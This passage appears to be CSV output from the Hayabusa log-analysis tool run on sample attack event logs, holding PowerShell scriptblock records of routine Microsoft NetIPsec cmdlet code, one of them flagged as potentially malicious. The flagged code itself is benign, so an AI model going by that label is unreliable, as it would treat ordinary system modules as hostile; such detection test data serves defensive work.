[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -con",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.660 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')]",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.660 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"tains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 